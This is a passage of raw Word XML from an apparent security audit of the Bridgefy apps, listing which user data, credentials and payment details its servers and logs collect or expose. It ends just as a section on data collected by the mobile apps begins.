          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId277">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://bridgefy.me/privacy-policy/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>highlights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>assignment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
          <w:tab w:pos="3714" w:val="left" w:leader="none"/>
          <w:tab w:pos="5365" w:val="left" w:leader="none"/>
          <w:tab w:pos="6516" w:val="left" w:leader="none"/>
          <w:tab w:pos="7468" w:val="left" w:leader="none"/>
          <w:tab w:pos="8371" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.sdk.bridgefy.services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.app.bridgefy.services and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MQTT broker store MQTT credentials in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>clear-text,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tokens,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>prekeys,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>userId,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>phone number, alias, displayName, avatar, direct messages (encrypted message, messageId, to, from, status, readedAt, receivedAt, etc.), client profiles (email, firstName, etc.), licenses, invoices, payment methods (stripeId, brand, last4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>expirationDate,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>country),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>etc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MongoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(mongodb+srv://staging.whqu3.mongodb.net)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-043</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId278">
        <w:r>
          <w:rPr>
            <w:i/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>www.googleapis.com</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>,</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="367" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The SDK web app sends the SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(licenseId,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>clientId,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>userId,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>etc.), the Firebase access token (user_id, email, name, etc.), Firebase password, Dashboard access token (clientId, userId, email, name, etc.), code, firstName, lastName, companyName, companyWebsite, country, role, industry, use, and paymentMethodId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.sdk.bridgefy.services. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="370" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The SDK web app sends the card number, cvc, exp_month, and exp_year to api.stripe.com, which is needed to process SDK payment subscriptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="363" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487634944">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1555534</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>388645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5001920" cy="3204210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="121" name="Image 121"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="121" name="Image 121"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5001920" cy="3204210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>During the AWS audit, it was found that AWS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudWatch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs for the SDK container reveal entire HTTP requests without sufficient masking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
